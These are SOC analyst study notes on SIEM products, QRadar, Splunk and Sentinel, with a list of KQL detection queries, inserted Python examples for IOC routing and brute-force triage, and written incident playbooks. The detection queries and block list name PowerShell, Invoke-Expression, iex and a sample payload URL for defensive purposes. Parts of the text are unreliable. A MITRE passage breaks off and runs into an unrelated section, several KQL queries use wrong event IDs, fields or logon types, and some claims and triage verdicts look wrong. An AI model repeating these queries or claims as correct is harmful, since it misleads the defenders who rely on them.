Exabeam | Incident Responder
LR | LR SOAR
Sentinel | Sentinel SOAR
Splunk | Phantom
Palo Alto | XSOAR
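The SOAR step described above (route the IP to the NGFW, the hash to the EDR), together with the TIF note earlier about blocking feed indicators only after a BIA, as an added example that is not part of the original notes. It classifies indicators, checks them, and decides which enforcement point gets each one; the tool names, the internal-range list and the sample indicators are this example's assumptions, and a real playbook would call the vendor APIs where this one returns a list of actions.

```python
"""SOAR-style IOC classification and routing (added example, not from the original notes)."""
import ipaddress
import re
from urllib.parse import urlparse

HASH_TYPES = {32: "md5", 40: "sha1", 64: "sha256"}
# Assumed enforcement split: IPs on the NGFW, domains on DNS, URLs on the proxy, hashes on the EDR.
ENFORCEMENT = {"ip": "ngfw", "domain": "dns", "url": "proxy",
               "md5": "edr", "sha1": "edr", "sha256": "edr"}
# Ranges that must never be auto-blocked at the perimeter: that is a self-inflicted outage.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
_HEX = re.compile(r"^[0-9a-f]+$", re.I)
_DOMAIN = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$", re.I)


def classify(ioc):
    """Return one of ip, domain, url, md5, sha1, sha256 or unknown."""
    s = ioc.strip()
    if _HEX.match(s) and len(s) in HASH_TYPES:
        return HASH_TYPES[len(s)]
    try:
        ipaddress.ip_address(s)
        return "ip"
    except ValueError:
        pass
    if "://" in s:
        u = urlparse(s)
        return "url" if u.scheme in ("http", "https") and u.netloc else "unknown"
    return "domain" if _DOMAIN.match(s) else "unknown"


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def build_playbook(iocs):
    """Return (actions, skipped): one block action per usable indicator, reasons for the rest."""
    actions, skipped, seen = [], [], set()
    for raw in iocs:
        kind = classify(raw)
        if kind == "unknown":
            skipped.append((raw, "unrecognised indicator type"))
            continue
        value = raw.strip() if kind == "url" else raw.strip().lower()  # URL paths are case-sensitive
        if (kind, value) in seen:
            skipped.append((raw, "duplicate"))
            continue
        seen.add((kind, value))
        if kind == "ip" and is_internal(value):
            skipped.append((raw, "internal address: needs BIA, not an automatic block"))
            continue
        actions.append({"ioc": value, "type": kind, "tool": ENFORCEMENT[kind], "action": "block"})
    return actions, skipped


# Constructed sample feed; 203.0.113.7 is a documentation address, .example a reserved TLD.
SAMPLE_IOCS = ["203.0.113.7", "10.10.10.1", "DEADBEEF" * 8, "evil.example",
               "http://evil.example/payload.exe", "not an ioc", "203.0.113.7"]

if __name__ == "__main__":
    acts, skips = build_playbook(SAMPLE_IOCS)
    for a in acts:
        print("block", a["type"], a["ioc"], "on", a["tool"])
    for ioc, why in skips:
        print("skip", ioc, ":", why)
```

The internal-range check is the automation equivalent of the BIA step in the notes: a feed entry that happens to be an RFC 1918 address, or the SIEM's own address from the configuration table, must go to a human rather than to the firewall.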

SIEM tools as per the Gartner 2024 report

Leaders: Splunk, Azure Sentinel, IBM QRadar, Securonix, Exabeam
Challengers: Sumo Logic, Rapid7, FortiSIEM
Niche players: Huawei, Logpoint, ManageEngine, QAX, Virustech
Visionaries: ELK, OpenText, Google Chronicle

Micro Focus (formerly HP) ArcSight
McAfee SIEM
AWS GuardDuty
LogRhythm
GENERIC SIEM ARCHITECTURE diagram

Licensing
1) GB/day
2) Total number of end users

Deployment
Hardware
Software
All in one box

Implementation
1) Stand alone: single location
2) Distributed: multiple locations
3) High availability

Feature perspective
1) Threat intelligence feeds
2) UEBA
3) SOAR
4) Threat hunting
5) Premium support
6) Integrating with or discovery of the assets
7) Risk manager
8) Vulnerability scanning
9) Flow integration and event integration

Additional licensing
1) SOAR
2) Storage or node
3) Threat hunting
4) UEBA (advanced analytics)
5) Flow integration: additional modules like a flow collector have to be purchased
6) Premium support

Architecture diagram or components
1) ESM (Enterprise security manager) or SIEM console or user console or GUI: administration of the SIEM, dashboard creation, report generation, threat hunting, UEBA, log activity and network activity. The SOC team (L1, L2 and L3 operations) uses this console to take care of security incident investigations.
2) Log manager or log processor or data processor: processing of the logs, i.e. indexing, querying, filtering and CRE.
3) Log collector: collection of the logs (aggregation), normalization and parsing.

SIEM tool backend process: how a security incident or alert is triggered
The LC/DC (log collector / data collector) collects the logs from different types of log sources like all servers, all databases, all applications, firewall, proxy, NIDS/NIPS, EDR, DLP, encryption, FIM, HIDS/HIPS, routers, switches, LB, LAN, WAN, VM, WAF and all the clouds, using different types of log integration methods. After collection the LC completes aggregation, parsing and normalization.
The LC/DC then sends the logs to the LP/LM. Thereafter the LP/LM/DP completes processing of the logs and additionally the backend processes like indexing, querying and filtering, and it also contains the backend CRE (correlation rule engine).
Whenever any abnormal, suspicious, illegitimate or unauthorised activity is done either by an internal employee or an external attacker, it hits the logic of the rules or policies or conditions or algorithms or use cases created under the LM/LP, and finally on the front end of the SIEM tool or user console an alert is triggered or notified.
As SOC team L1, L2 and L3 team members we take care of the security incident investigations and forensic analysis.

Designing
Stand alone: all three components should be deployed in the same location.
Distributed:
Hyd HQ
BNG branch office 1
Chn branch office 2
MBM branch office 3
Two parameters can be chosen if we want to calculate the price or cost:
1) Send the logs from the remote branch offices to HQ: how much cost is involved?
2) Evaluate how much hardware or software is required if the collection and processing can be done in the branch office itself: how much cost is involved?

Generic SIEM tool implementation
1) Assign the IP address or hostname (management IP or management hostname of the SIEM console or user console or GUI)
2) Subnet mask
3) Default gateway
4) Primary DNS
5) Secondary DNS integration
6) Integrating with AD
7) Define the RBAC for L1, L2 and L3
8) User management: RBAC, user groups
9) Single tenant / multi tenant
10) Log onboarding / data source onboarding
11) Correlation rule creation
12) Fine tuning
13) Stabilising the SOC operations: minimum 6 weeks to 15 weeks
14) SOP or runbook or playbook
15) Dashboard creation
16) Health check-up
17) Report generation
18) SMTP server
19) AD (context tables) for UEBA
20) Proxy

RCA (Root cause analysis): step-by-step process documentation for true positive scenarios, whenever an attacker has compromised any system. It provides where, when, how, why and what got compromised in the incident, and what appropriate actions have been taken as per incident lifecycle management using the IR process.

Playbook or runbook or SOP: a step-by-step or phase-by-phase approach of what the L1 team has to do, what the L2 team has to do and what the L3 team has to do as part of the security incident investigation whenever any security incident is triggered.

MTTD (Mean time to detect): the average time it takes to detect an incident.
MTTI (Mean time to identify): the average time it takes to identify the incident category.
MTTR (Mean time to recovery): the average time to recover the data.
MTTR (Mean time to respond): the average time it takes to respond to the incident alerts as per the IR process.

Explain the day-in, day-out tasks: what will you do?
Shift takeover
Working on security incidents
Shift handover
Health check-up

Shift handover: the team working the current shift provides the task information or incident information to the forthcoming shift (how many incidents are closed, WIP, on hold, resolved); this is called shift handover and is done via a call.

Shift takeover: the forthcoming team taking the incident information from the existing or previous team is called shift takeover.

SLA: a contractual agreement between the customer and the consulting/service-based company on how much time it will take to complete the security incident investigation, based on the severity level. SLAs are time based.

2) IBM QRadar
QRadar architecture diagram
1) Event collector or flow collector (hardware-based models 1200, 1300 or 1400): the event collector collects the logs from different types of log sources or data sources; the flow collector collects the flow data from different types of data sources (NetFlow, sFlow, J-Flow etc.). Functions: aggregation, parsing, normalization.
2) Event processor and flow processor or data processor (hardware-based models 1700, 1800 and 1900): the event processor collects the logs from the event collector and then does the processing of the logs; the flow processor collects the flow data from the flow collector and does the processing of the flow data. Functions: indexing, querying, filtering, CRE.
3) QRadar console or user console or SIEM console or GUI: takes care of QRadar SIEM administration, implementation, configuration, log onboarding, fine tuning, correlation rule creation, SOC operations, threat hunting, SOAR, UEBA, and also creation of dashboards and report generation.
4) Node: storing of the logs for forensic analysis and also auditing.

Backend process: as described under the generic SIEM architecture.

QRadar licensing: GB/day

QRadar storage calculation: 1000 EPS for 90 days = 6.5 TB
Example: Apollo requires 1 year of retention; how much storage is required for 5000 EPS?
5 * 6.5 TB * 4 = 130 TB (5000/1000 = 5 units of EPS; 1 year = 4 periods of 90 days)

SIEM tool hardware model
Deployment: hardware based (models 3,425,347,542,754,250), software, all in one box (EC, FC, EP, FP and ESM)
Implementation: standalone (single location), distributed (multiple locations), cloud (QRoC: QRadar on Cloud)
Note: IBM has sold QRoC to Palo Alto; it is now part of Palo Alto's XSOAR portfolio.

IBM QRadar features
1) Asset discovery
2) Vulnerability scanning
3) NetFlow
4) Risk manager
5) UEBA
6) Threat hunting
7) SOAR: IBM Resilient
8) Premium support
9) Additional storage

Log integration methods
Syslog (push): 514 and 6514
Collector agent (push): 443, 8443, 9093
Flow collector (SPAN/mirror/tap)
API (pull)
MSRPC (push)
WMI (push)

Admin console port number: 8443

Coalescing in IBM QRadar: removing of the duplicates

Offense: a security incident on the IBM QRadar side is called an offense.

Magnitude (risk score): the average of relevance, severity and credibility. We can define the magnitude score under correlation rule creation / policy creation / use case creation. The magnitude score is on a 0 to 10 scale.

Example: take a whaling category of attack
Relevance 9
Severity 10
Credibility 9
Magnitude = (10 + 9 + 9) / 3 = 9.33, rounded to 9
Magnitude 9 = Critical severity

Prioritisation exercise (rank given by each analyst)
Incident | Karthik | Ravikanth | Nagarjuna | Siva
1) Server got compromised by ransomware | 2 | 1 | 1 | 2
2) End user system got compromised by a virus | 3 | 3 | 2 | 1
3) One of the CEOs received a malicious URL link as a phishing email | 1 | 2 | 3 | 3

Backend QRadar databases: AQL (IBM), PGSQL (PostgreSQL query language)

CEF (Common Event Format) vs LEEF (Log Event Extended Format, IBM)

DSM (Device Support Module) integration: can be used to integrate third-party log sources or data sources, i.e. other than IBM products, e.g. a Palo Alto firewall.

Splunk forwarder comparison
 | Universal forwarder | Light forwarder | Heavy forwarder
Data processing | No processing | Basic | Full parsing
Resource usage | Minimal | Moderate | High
Use case | High volume data collection | Light processing before forwarding to search indexers | Complex processing before forwarding to search indexers

Splunk buckets: there are two reasons we use Splunk buckets
1) Retention policy
2) Auditing

There are 4 types of buckets under Splunk: hot, warm, cold and frozen.
Bucket type | Description | Data age | Storage | Searchable
Hot | Actively written data | Newest | Fast | Yes
Warm | Rolled from hot; indexed, no longer actively written | Recent | Partial | Yes
Cold | Older data rolled from warm | Older | Slower | Yes
Frozen | Deleted or archived data | Oldest | Archived | No

Splunk risk score or severity of the incident: 0-100

Alert or incident types: Critical, High, Medium, Low, Info

Licensing option: based on GB/day

Splunk console: alerts / case management / UEBA / threat hunting / SOAR / admin / log and reporting

Azure Sentinel (query-based solution)
Main competitors are
1) IBM QRadar
2) Splunk
3) Securonix
4) LogRhythm
5) Exabeam

Advantages
1) Easy to deploy
2) Cost or price is less: based on EPS count, storage and GB/day
3) Elasticity (horizontal growth and vertical growth)
4) High availability
5) Threat hunting is nice
6) Threat intelligence feeds
7) Azure Sentinel can be integrated with the MITRE ATT&CK framework

Azure Sentinel architecture diagram or components (implementation, configuration or administration of Azure Sentinel)
1) Data connectors: used to integrate the inbuilt Microsoft products as data sources or log sources, and additionally to integrate third-party vendors' log or data sources.
Examples: Microsoft EDR, Microsoft O365 phishing email gateway, Microsoft Azure Security Center, Microsoft servers, endpoints; third party: Cisco, HP, IBM, McAfee, Trend Micro, Symantec, Palo Alto, CrowdStrike, Check Point
2) Playbooks or SOP or runbook: a guide or procedural document; it takes care of the automatic response whenever any security incident is triggered under Azure Sentinel.
3) Analytics: to create customized correlation rules for known or unknown categories of attacks using KQL (Kusto query language) queries.
4) Azure Sentinel community edition (GitHub): sample queries for threat hunting, playbook creation and correlation rule creation; it is free of cost once we are purchasing Azure Sentinel.
5) Log analytics workspace: a container that consists of data and configuration; it is also used for storing the logs (retention policy) based on the business we are doing.

Threat management
1) Dashboards: provide visualization of the data gathered from different data sources or log sources, and are also used for enabling security incident investigations.
2) Cases: the collection of evidence related to a specific investigation of known or unknown categories of attacks, from new to closure of the incident (case management).
3) Hunting: hunting threats proactively to take care of the incident investigation, using manual or automated or hypothesis-driven hunting with the KQL query language.
4) Notebooks: Sentinel uses third-party Jupyter notebooks to take care of unknown categories of attack using ML/AI and behavioural pattern mechanisms.

Licensing options GB/day

deployment Stand alone


Distubted

Implementation Cloud ( SaaaS)

Backend databasees or query language KQL ( Kusto query lanagauge )

Log format CEF

log integration methods 1) Data connector


2) sylog
3) api token method
4) cloud connector method

Threat hunting KQL


UEBA = UBA + EBA
SOAR Microsoft SOAR

Risk score or severity score: 0-10 (data analytics, mathematical calculations, based on a statistical approach, the anomaly factor, the type of the attack and normal vs abnormal events). Similar to IBM QRadar.
Critical 8-10
High 6-8
Medium 4-6
Low 2-4
Info 0-2

Log analytics: can be used for deeper investigation, threat hunting, storage and retention policy etc.

Features or additional licensing functions: 1) UEBA 2) SOAR 3) Deployment server 4) GTI 5) Threat hunting 6) Premium support 7) Storage

Implementation
1) Azure Sentinel subscription
2) Region specify
3) Management IP and hostname or internet: it should not be exposed to the public; it should be accessed via VPN
4) Subnet mask, default gateway
5) Space or retention
6) Integrating either on-premise AD or Azure AD (UEBA) - Windows admin or sys admin or network admin
7) Integrate DNS servers - Network team
8) Integrate proxy server - Network security team
9) Integrate with SMTP server - Email admin or network admin or Windows admin
10) Log onboarding (Data connectors)
11) Verify log onboarding issues, admin or config, normalization, parsing and aggregation, filtering and indexing issues
12) Based on business requirement, verify and validate whether sufficient out-of-the-box correlation rules are provided by Sentinel, or whether we can create customized correlation rules based on our requirement and on regular threat intelligence feeds
13) Verify on a quarterly basis, by auditing the correlation rules, whether all the rules are utilised or not
14) SOC L1, L2, L3 operations support, threat hunting, SOAR and UEBA and reverse engineering etc
15) High availability (Active passive)
Top 300 Azure Sentinel Use Cases: KQL (Kusto Query Language) queries.

1. Failed login attempts:


SecurityEvent
| where EventID == 4625

2. Successful login attempts:


SecurityEvent
| where EventID == 4624

3. Brute-force attacks:
SecurityEvent
| where EventID == 4625
| summarize count() by TargetUserName
| where count_ > <threshold>

4. Account lockouts:
SecurityEvent
| where EventID == 4740

5. User account changes:


SecurityEvent
| where EventID == 4738 or EventID == 4720

6. Privileged account usage:


SecurityEvent
| where EventID in (4672, 4673, 4688) and AccountType == 'User'

7. Suspicious process execution:


SecurityEvent
| where EventID == 4688 and CommandLine has_any ('powershell.exe', 'cmd.exe')

8. Data exfiltration:
SecurityEvent
| where EventID == 5145 and AccessMask == '0x2'

9. Network traffic anomalies:


SecurityAlert
| where ProviderName == 'MicrosoftNetworkProtection' and AlertType == 'AnomalousNetworkTraffic'

10. Malware detection:
SecurityAlert
| where ProviderName == 'MicrosoftDefenderATP' and AlertType == 'MalwareDetection'

11. DDoS attacks:


SecurityAlert
| where ProviderName == 'DDoSProtection' and AlertType == 'DDoSGeneric'

12. Suspicious PowerShell activity:


SecurityEvent
| where EventID == 4104 and (CommandLine has_any ('Invoke-Expression', 'Invoke-Script', 'iex'))

13. Unusual account behavior:


SecurityEvent
| where EventID == 4724 or EventID == 4725

14. Privilege escalation attempts:


SecurityEvent
| where EventID == 4672 and NewProcessName contains 'cmd.exe'

15. Failed service principal logins:


AuditLogs
| where OperationName == 'Sign-in by service principal' and ResultType == 'failure'

16. Suspicious Azure AD sign-ins:


AuditLogs
| where ActivityDisplayName == 'Sign-in' and ResultType == 'failure'

17. Unusual lateral movement:


SecurityEvent
| where EventID == 4624 and LogonType == 3

18. Azure resource modifications:


AzureActivity
| where OperationName == 'Microsoft.Resources/subscriptions/resourcegroups/write'

19. Unusual DNS queries:


DnsEvents
| where QueryType == 'A' and isnotempty(Name) and Name !startswith 'Microsoft'

20. Data access by unusual IP addresses:
SecurityEvent
| where EventID == 4663 and SourceAddress !in ('x.x.x.x', 'y.y.y.y')

21. Large data exports:


AuditLogs
| where OperationName == 'Export' and ResultType == 'success'

22. Unusual process creation:


SecurityEvent
| where EventID == 4688 and ParentProcessName != @'C:\Windows\System32\svchost.exe'

23. Suspicious Azure VM operations:


AzureActivity
| where ResourceType == 'Microsoft.Compute/virtualMachines' and OperationName in
('Microsoft.Compute/virtualMachines/write', 'Microsoft.Compute/virtualMachines/delete')

24. Failed SQL Database access attempts:


SecurityEvent
| where EventID == 18456 and LogonType == 8

25. Azure AD user password changes:


AuditLogs
| where ActivityDisplayName == 'Password reset' and ResultType == 'success'

26. Account enumeration attempts:


SecurityEvent
| where EventID == 4625 and FailureReason == 3221225578

27. Suspicious Azure Storage operations:


AzureActivity
| where ResourceType == 'Microsoft.Storage/storageAccounts' and OperationName in
('Microsoft.Storage/storageAccounts/write', 'Microsoft.Storage/storageAccounts/delete')

28. Suspicious PowerShell modules loaded:


SecurityEvent
| where EventID == 4104 and (ParentImage contains 'powershell.exe' or Image contains 'powershell.exe')

29. Failed Exchange mailbox login attempts:
SecurityEvent
| where EventID == 4625 and LogonType == 10

30. Suspicious Azure Key Vault access:


AuditLogs
| where ActivityDisplayName == 'Access granted to Key Vault' and ResultType == 'success'

31. Unusual VPN logins:


SecurityEvent
| where EventID == 4647 and LogonType == 21

32. Failed RDP login attempts:


SecurityEvent
| where EventID == 4625 and LogonType == 10

33. Suspicious Azure Function operations:


AzureActivity
| where ResourceType == 'Microsoft.Web/sites/functions' and OperationName in
('Microsoft.Web/sites/functions/write', 'Microsoft.Web/sites/functions/delete')

34. Unusual Azure AD application registrations:


AuditLogs
| where ActivityDisplayName == 'Add an application' and ResultType == 'success'

35. Suspicious network port scans:


SecurityEvent
| where EventID == 5156 and Port >= 1 and Port <= 1024

36. Failed Azure VM login attempts:


AzureActivity
| where ResourceType == 'Microsoft.Compute/virtualMachines' and OperationName ==
'Microsoft.Compute/virtualMachines/login/action'

37. Unusual Azure NSG rule modifications:


AzureActivity
| where ResourceType == 'Microsoft.Network/networkSecurityGroups/securityRules' and
OperationName in ('Microsoft.Network/networkSecurityGroups/securityRules/write',
'Microsoft.Network/networkSecurityGroups/securityRules/delete')

Interactive Logon (Logon Type 2)

• This type is used when a user directly logs into the computer at the physical
console or via a graphical interface. It typically involves entering a username and
password.

Network Logon (Logon Type 3)

• This occurs when a user logs on to a system over the network. It includes
accessing shared resources or files on a networked machine.

Batch Logon (Logon Type 4)

• This type is used for scheduled tasks that are set to run automatically without
user interaction, such as a batch job or script running.

Service Logon (Logon Type 5)

• Used by Windows services to log on to the system without requiring user
intervention. Services are background processes like those responsible for
system operations.

Remote Interactive Logon (Logon Type 10)

• This logon type is used when accessing a system remotely, typically through
Remote Desktop Protocol (RDP). It is a method for users to log in remotely to a
machine.

Network Cleartext Logon (Logon Type 8)

• This logon occurs when a user logs in over the network and the password is
transmitted in cleartext (unencrypted), often with older authentication protocols.

Unlock Logon (Logon Type 7)

• This logon occurs when a user unlocks a session that was previously locked,
either manually or by system settings.
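As an added example (not from these notes), the "failed login attempts" and "brute-force" KQL use cases above, run as a triage script over a few constructed SecurityEvent-style lines; the verdict follows the three scenarios the notes describe for multiple authentication failures (internal user, external attacker that did not succeed, external attacker that succeeded). The internal ranges, threshold and window are assumptions, and all log lines and IPs are constructed.

```python
"""Brute-force triage over constructed Windows Security events (added example).
Field names follow SecurityEvent columns (EventID, IpAddress, TargetUserName,
LogonType); every log line is constructed and the IPs are documentation ranges."""
from collections import defaultdict
from datetime import datetime, timedelta
import ipaddress

# Logon type names as listed in the notes.
LOGON_TYPES = {2: "Interactive", 3: "Network", 4: "Batch", 5: "Service",
               7: "Unlock", 8: "NetworkCleartext", 10: "RemoteInteractive"}

# "Internal" means the business's RFC 1918 ranges (assumption for this example).
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed sample log: one line per Security event, 'timestamp key=value ...'.
SAMPLE_LOG = """\
2024-05-01T10:00:00Z EventID=4625 IpAddress=203.0.113.10 TargetUserName=alice LogonType=10
2024-05-01T10:00:20Z EventID=4625 IpAddress=203.0.113.10 TargetUserName=alice LogonType=10
2024-05-01T10:00:40Z EventID=4625 IpAddress=203.0.113.10 TargetUserName=alice LogonType=10
2024-05-01T10:01:00Z EventID=4625 IpAddress=203.0.113.10 TargetUserName=alice LogonType=10
2024-05-01T10:01:20Z EventID=4625 IpAddress=203.0.113.10 TargetUserName=alice LogonType=10
2024-05-01T10:01:45Z EventID=4624 IpAddress=203.0.113.10 TargetUserName=alice LogonType=10
2024-05-01T09:30:00Z EventID=4625 IpAddress=10.10.10.1 TargetUserName=bob LogonType=2
2024-05-01T09:30:30Z EventID=4625 IpAddress=10.10.10.1 TargetUserName=bob LogonType=2
2024-05-01T09:31:00Z EventID=4625 IpAddress=10.10.10.1 TargetUserName=bob LogonType=2
2024-05-01T09:31:30Z EventID=4625 IpAddress=10.10.10.1 TargetUserName=bob LogonType=2
2024-05-01T09:32:00Z EventID=4625 IpAddress=10.10.10.1 TargetUserName=bob LogonType=2
2024-05-01T09:33:00Z EventID=4624 IpAddress=10.10.10.1 TargetUserName=bob LogonType=2
2024-05-01T11:00:00Z EventID=4625 IpAddress=198.51.100.9 TargetUserName=alice LogonType=3
2024-05-01T11:00:10Z EventID=4625 IpAddress=198.51.100.9 TargetUserName=alice LogonType=3
2024-05-01T11:00:20Z EventID=4625 IpAddress=198.51.100.9 TargetUserName=alice LogonType=3
2024-05-01T11:00:30Z EventID=4625 IpAddress=198.51.100.9 TargetUserName=alice LogonType=3
2024-05-01T11:00:40Z EventID=4625 IpAddress=198.51.100.9 TargetUserName=alice LogonType=3
2024-05-01T08:00:00Z EventID=4625 IpAddress=198.51.100.7 TargetUserName=svc-backup LogonType=3
2024-05-01T08:15:00Z EventID=4625 IpAddress=198.51.100.7 TargetUserName=svc-backup LogonType=3
2024-05-01T08:30:00Z EventID=4625 IpAddress=198.51.100.7 TargetUserName=svc-backup LogonType=3
2024-05-01T08:45:00Z EventID=4625 IpAddress=198.51.100.7 TargetUserName=svc-backup LogonType=3
2024-05-01T09:00:00Z EventID=4625 IpAddress=198.51.100.7 TargetUserName=svc-backup LogonType=3
"""

def parse_log(text):
    """Parse the constructed 'timestamp key=value ...' lines into event dicts."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, *fields = line.split()
        ev = {"time": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")}
        for field in fields:
            key, value = field.split("=", 1)
            ev[key] = int(value) if key in ("EventID", "LogonType") else value
        events.append(ev)
    return events

def source_class(ip):
    """'internal' for the business ranges above, otherwise 'external'."""
    addr = ipaddress.ip_address(ip)
    return "internal" if any(addr in net for net in INTERNAL_NETS) else "external"

def triage(events, threshold=5, window=timedelta(minutes=10)):
    """One finding per (source IP, target user) with >= threshold 4625 failures
    inside any sliding `window`; the verdict follows the notes' three scenarios:
    1) internal source -> confirm with the user (likely false positive),
    2) external source, no later 4624 -> attempt failed (false positive, block),
    3) external source followed by a 4624 success -> true positive."""
    by_key = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["time"]):
        by_key[(ev["IpAddress"], ev["TargetUserName"])].append(ev)
    findings = []
    for (ip, user), evs in by_key.items():
        failures = [e for e in evs if e["EventID"] == 4625]
        peak, start = 0, 0
        for end in range(len(failures)):          # sliding window over failures
            while failures[end]["time"] - failures[start]["time"] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak < threshold:
            continue
        succeeded = any(e["EventID"] == 4624 and e["time"] > failures[-1]["time"]
                        for e in evs)
        origin = source_class(ip)
        if origin == "internal":
            scenario, verdict = 1, "likely_false_positive"
            action = "confirm with the end user and their team"
        elif succeeded:
            scenario, verdict = 3, "true_positive"
            action = "contain the host, reset the password, check DLP/FW logs"
        else:
            scenario, verdict = 2, "false_positive"
            action = "check IP reputation and block the source at the firewall"
        findings.append({"ip": ip, "user": user, "origin": origin,
                         "failures_in_window": peak,
                         "logon_type": LOGON_TYPES.get(failures[-1]["LogonType"], "Other"),
                         "succeeded_after_failures": succeeded,
                         "scenario": scenario, "verdict": verdict, "action": action})
    return findings
```

Running `triage(parse_log(SAMPLE_LOG))` yields three findings; the five failures from 198.51.100.7 are spread over an hour and never reach the threshold inside one window, so they produce none.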

Persistence

The adversary is trying to maintain their foothold.

Account Manipulation

Adversaries may manipulate accounts to maintain and/or elevate access to victim
systems. Account manipulation may consist of any action that preserves or modifies
adversary access to a compromised account, such as modifying credentials or
permission groups. These actions could also include account activity designed to
Multiple authentication login failure attempts (Brute force attack) --- Windows (End point)

Data source / Log source: Domain controller / End point logs
Log integration method: Collector agent / Windows collector agent
Log collector: Aggregation, Parsing and Normalization
Log processor / Log Manager: Processing of the logs, Filtering, Indexing, Querying
CRE: Multiple authentication login failures from the same source user; multiple authentication login failures coming from the same source IP (Private / Public)
SIEM (dashboard / Alerts): Alerts / Incident / Alarm / Offenses - Brute force attack, Dictionary attack
Client SIEM notes: TCS SBI SIEM; HSBC SIEM, EDR, NGFW, Proxy, Email GW, DLP

L1: Basic investigation / False positive vs true positive, Recommendations
L2: IR
L3 / SME / Team lead: Threat hunting, UEBA analysis, P1 and escalated tickets; also log onboarding issues, parsing related issues, correlation rule creation, ITIL, SIEM tool upgrades, SME / technical, SOAR - Automation

NGFW / Proxy logs: to verify whether outbound connections or inbound connections are going from attacker to victim and vice versa, whether lateral movement has happened or not, and whether a privilege escalation attack has been done by the attacker.
DLP logs: to confirm whether data exfiltration or data breach or data copied by the attacker has happened.

Possible scenarios:
1) Internal employee authentication failures - False positive
2) External attacker authentication failures, attacker did not succeed - False positive
3) External attacker succeeded after several attempts - True positive

Incident life cycle: Preparation, Identification, Containment, Eradication, Recovery, Lessons learned or post mortem report
Scenario 1: Multiple authentication login failure attempts - Internal IP / User
1) Alert: Email notification / Dashboard of the SIEM tool
2) Assign the ticket to yourself
3) Triaging of the incident: Asset profiling, User profiling, Attacker profiling

Asset profiling: Asset name, OS type, Brand model name, event time stamp
User profiling: User name, User IP, Team
Data source / Log source: AD/DC, End point logs
Correlation rule: Correlation rule identification
Payload
Log analysis: AD/DC/End point logs, Windows logon type, Windows event ID, whether a public IP is existing or it is a private IP address
Evidence confirmation: Outbound connections are not going on, Authentication failure logs, Password change details
Log sources for Brute force attack: AD/DC or end user system logs

Option 1: Multiple authentication login failures within a short span of time (False positive)
Brute force attack to end user system - 1.1.1.1 (Public) - External attack

1. Recently I have done a multiple authentication login failures incident investigation.
2. Alert is received through IBM QRadar SIEM dashboard and also from email notification.
3. I went to the SIEM dashboard, assigned the ticket to myself and also acknowledged to other SOC team members as well.
4. After that I went and created a ticket in the ticketing tool. In my organization we are using the ServiceNow ticketing tool for tracking of the incidents.
5. After creating the ticket in the ticketing tool, I started triage of the information like IOC, IOA, asset profiling, user profiling. Nothing but I have gathered victim IP related details, IP address, username or system name.
6. Also I found external attacker IP address details as well.
7. Then I came to know that it is an external attack based on the IP address details received in the alert.
8. I have done log analysis and also verified the reputation in tools like MX tool, Virustotal.com, IPVoid, AbuseIPDB and found that this activity happened from the malicious IP.
9. Then I took the IP address and blocked the IP address in the firewall.
10. Finally I attached the evidence in the ticketing tool, mentioned the comments or notes in the tool, made a summary of the report and closed the incident.

Option 2: Multiple authentication failures within a short span of time (False positive)
Brute force attack to end user laptop - 10.10.10.1 (Private IP) - Internal attack

1. Recently I have done a multiple authentication login failures incident investigation.
2. Alert is received through IBM QRadar SIEM dashboard and also from email notification.
3. I went to the SIEM dashboard, assigned the ticket to myself and also acknowledged to other SOC team members as well.
4. After that I went and created a ticket in the ticketing tool. In my organization we are using the ServiceNow ticketing tool for tracking of the incidents.
5. After creating the ticket in the ticketing tool, I started triage of the information like IOC, IOA, asset profiling, user profiling. Nothing but I have gathered victim IP related details, IP address, username or system name.
6. I found this activity happened from an internal IP address and found that one of the internal users has done it.
7. After gathering the information I have sent an email to the end user, because I have access to contact the end user, and based on his confirmation I found that it is internal activity of the internal employee or end user.
8. I got a confirmation mail stating that by mistake the end user tried more than 5 attempts.
9. I attached the mail confirmation as evidence, made a summary of the report, updated the comments and closed the incident.

Option 3: Multiple authentication failures within a short span of time (True positive)
Brute force attack to end user laptop - 1.1.1.1 - External attack

1. Recently I have done a multiple authentication login failures incident investigation.
2. Alert is received through IBM QRadar SIEM dashboard and also from email notification.
3. I went to the SIEM dashboard, assigned the ticket to myself and also acknowledged to other SOC team members as well.
4. After that I went and created a ticket in the ticketing tool. In my organization we are using the ServiceNow ticketing tool for tracking of the incidents.
5. After creating the ticket in the ticketing tool, I started triage of the information like IOC, IOA, asset profiling, user profiling. Nothing but I have gathered victim IP related details, IP address, username or system name.
6. I found this activity happened from an external attacker and I have done the log analysis of the Domain controller, and also some of the victim IP connections keep on communicating with the attacker IP address.
7. Immediately I found that legitimate activity is going on and it is true positive.
8. As per the incident life cycle management process I have done containment after analysing BIA (Business impact analysis) and risk assessment, because only one user is going to be impacted if I am doing containment.
9. Later I asked the Windows admin team / help desk / service desk to reset the password to stop additional data breach.
10. Then I have run the AV scans and also verified DLP/FW logs whether a data breach happened. Fortunately there is no data breach happened and data did not get copied.
11. Then I brought it back from abnormal to normal operations and connected it back to the network.
12. Also as per the Lessons learned and post mortem report phase I created an RCA (Root cause analysis) document and reviewed it with the SOC manager and also presented this report to the client. In the RCA I found that the end user did not change the default password when he was onboarded initially; he is using the same password.
13. Also updated the SOP document.
14. For future reference provided security awareness training to employees and asked them to use complex and strong passwords.
Malware (End Point and server)

Data source / Log source - Log integration method:
AV/EDR - API token (SaaS) / Syslog (Hardware)
NGFW - Syslog
AM - Syslog / API token
NIDS/NIPS - Syslog
Email GW - API token / Syslog
Log collector: Aggregation, Parsing and Normalization
Log processor / Log Manager: Processing of the logs, Filtering, Indexing, Querying, CRE engine - Malware detected, Trojan detected, Virus detected, Abnormal / Malicious / Suspicious pattern behaviour of the file
SIEM (dashboard / Alerts): Alerts / Incident / Alarm / Offenses
Malware detection outcomes: Internal user - False positive; External attacker - False positive; External attacker - True positive (End point or Server)
End Point - Malware investigation (Laptop, Mobile, WS, DT, MacBook)

